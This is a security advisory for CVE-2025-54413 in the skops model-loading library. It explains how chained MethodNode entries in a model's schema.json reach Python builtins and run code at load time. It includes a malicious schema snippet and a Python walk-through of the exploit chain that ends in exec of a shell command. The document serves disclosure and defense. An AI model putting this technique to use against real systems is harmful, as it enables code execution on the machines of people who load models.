Skip to content

MethodNode can access unexpected object fields through dot notation, leading to arbitrary code execution at load time

High
adrinjalali published GHSA-4v6w-xpmh-gfgp Jul 25, 2025

Package

pip skops (pip)

Affected versions

< 0.12

Patched versions

0.12.0

Description

Summary

An inconsistency in MethodNode can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time.

While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types.

Details

The MethodNode allows access to attributes of existing objects via dot notation. However, there are several critical shortcomings:

  • Although the __class__ and __module__ fields are checked via get_untrusted_types and during the load phase (as a concatenated string), they are not actually used by MethodNode. Instead, the func and obj entries in the schema.json are used to determine behavior. This means that even an apparently harmless __module__.__class__ pair can lead to access of arbitrary attributes or methods of loaded objects, without any additional checks.

  • Nothing prevents an attacker from chaining multiple MethodNode instances to traverse the object hierarchy and access harmful attributes.

An object can be loaded using the ObjectNode, which normally enforces strict checks and allows only trusted or explicitly permitted objects. However, once the object is loaded, dot notation can be used to access any of its attributes or methods. Furthermore, by chaining multiple MethodNodes, one can traverse the Python object hierarchy and reach dangerous components such as the builtins dictionary—which contains functions like exec and eval.

This vulnerability allows the attacker to bypass both get_untrusted_types and load checks, enabling access to dangerous attributes and methods without triggering any alerts. As demonstrated in the PoC, arbitrary code execution is possible using just an anonymous object returned by get_untrusted_types (in the example, builtins.int, though any type would suffice since it doesn't influence the exploit).

For example, consider a malicious schema.json snippet like:

...
"__class__": "int",
"__module__": "builtins",
"__loader__": "MethodNode",
"content": {
  "obj": {
    "__class__": "int",
    "__module__": "builtins",
    "__loader__": "MethodNode",
    "content": {
      "obj": {
        "__class__": "QuadraticDiscriminantAnalysis",
        "__module__": "sklearn.discriminant_analysis",
        "__loader__": "ObjectNode",
        "__id__": 1
      },
      "func": "decision_function"
    }
  },
  "func": "__builtins__"
}
...

Here, the attacker loads a trusted QuadraticDiscriminantAnalysis object using ObjectNode, accesses its decision_function method via MethodNode, and then uses another MethodNode to access the __builtins__ dictionary—all without triggering the untrusted type detection mechanisms.

Proof of Concept (PoC)

The provided PoC demonstrates arbitrary code execution using only builtins.int as the type returned by get_untrusted_types and verified by load. Note that the actual type is fully controlled by the attacker and can be anything (e.g., provola.whatever), as it's not used by skops or the exploit.

Components Used in the Exploit

To craft the exploit, I used the following skops nodes:

  • MethodNode – to silently access arbitrary Python attributes via dot notation. This is the vulnerable core.
  • ObjectNode – to load a trusted object and use it as a base to access its attributes and methods. Also used to set object state via __setstate__.
  • PartialNode – to easily control arguments passed to functions accessed.
  • DefaultDictNode – to store a crafted call to exec using the default_factory attribute.
  • DictNode – to trigger the call at load time.
  • JsonNode, TypeNode, ListNode, etc. – for basic types, structures, and constants.

Additionally, the interesting implementation of GridSearchCV.score was leveraged, specifically:

def score(self, X, y=None, **params):
    ...
    scorer = self.scorer_[self.refit]
    return scorer(self.best_estimator_, X, y, **score_params)

Exploit Logic (Python Equivalent)

The schema.json used in this exploit is quite complex and carefully constructed. For this reason, I prefer to illustrate the exploit logic using the following Python code, which presents the core idea in a simplified and readable format. It simulates how the malicious schema.json is interpreted and executed by skops during model loading. The complete malicious skops model is attached for reference. This code demonstrates how an attacker can manipulate trusted objects and attributes using MethodNode, ultimately gaining access to the __builtins__ dictionary and invoking exec with a controlled payload. By chaining multiple nodes and leveraging Python's object model, arbitrary code execution is achieved—without triggering any type validation mechanisms.

from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
from sklearn.model_selection._search import GridSearchCV
from functools import partial
from collections import defaultdict

# Step 1: Access builtins via dot traversal
a = QuadraticDiscriminantAnalysis().decision_function.__builtins__

# Step 2: Prepare GridSearchCV with overridden attributes
b = GridSearchCV()
b._sklearn_version = "1.7.0"
... # Less interesting attributes
b.scorer_ = a  # builtins dict
b.refit = "exec"
b.best_estimator_ = "import os; os.system('/bin/sh')"

# Step 3: Create callable chain
c = b.score
d = partial(c, {}, {})  # empty dicts as globals/locals
e = defaultdict(**{})
e.default_factory = d
f = e.__getitem__  # dot traversal again :)

# Step 4: Force __getitem__ with a missing key to trigger default_factory

What we can see here is that, when f is called, it invokes the __getitem__ method of a defaultdict. Since the requested key doesn’t exist (the dict is empty), default_factory is triggered — which is the partial function d, wrapping the score method of the loaded GridSearchCV object.

Critically, the attributes of the GridSearchCV object (scorer_, refit, and best_estimator_) have been overwritten so that:

  • scorer_ is the __builtins__ dictionary,
  • refit is set to "exec" — selecting the exec function from __builtins__,
  • best_estimator_ contains the malicious payload: "import os; os.system('/bin/sh')".

When score() is eventually called via the partial function, it resolves self.scorer_[self.refit] to exec, and then calls it as:

exec(self.best_estimator_, {}, {})

In other words:

exec("import os; os.system('/bin/sh')", {}, {})

This leads to arbitrary command execution.

Finally, to trigger this chain, it's sufficient to force a call to f (i.e., __getitem__) with a key that doesn’t exist. This can be done automatically at model load time using DictNode. We use the implementation of DictNode._construct():

def _construct(self):
    content = gettype(self.module_name, self.class_name)()
    key_types = self.children["key_types"].construct()
    for k_type, (key, val) in zip(key_types, self.children["content"].items()):
        content[k_type(key)] = val.construct()
    return content

By setting key_types = [f] and using a missing key, the exploit executes automatically during model loading.

What is shown when loading the model

Suppose a user loads the model with the following code:

from skops.io import load, get_untrusted_types

unknown_types = get_untrusted_types(file="model.skops")
print("Unknown types", unknown_types)
input("Press enter to load the model...")
loaded = load("model.skops", trusted=unknown_types)

The output will be:

Unkonown types ['builtins.int']
Press enter to load the model...

However, the model loading will trigger the execution of the payload, which in this case is a shell command. The same can be modified to execute any arbitrary code.

Impact

An attacker can craft a malicious model file that, when loaded, executes arbitrary code on the victim’s machine. This occurs at load time, requiring no user interaction beyond loading the model. Given that skops is often used in collaborative environments and is designed with security in mind, this vulnerability poses a significant threat.

Attachments

The complete PoC is available on GitHub at io-no/CVE-2025-54413.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v4 base metrics

Exploitability Metrics
Attack Vector Local
Attack Complexity Low
Attack Requirements Present
Privileges Required None
User interaction Active
Vulnerable System Impact Metrics
Confidentiality High
Integrity High
Availability High
Subsequent System Impact Metrics
Confidentiality High
Integrity High
Availability High

CVSS v4 base metrics

Exploitability Metrics
Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.
Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.
Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.
Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.
User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.
Vulnerable System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
Subsequent System Impact Metrics
Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.
Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).
Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CVE ID

CVE-2025-54413

Weaknesses

No CWEs

Credits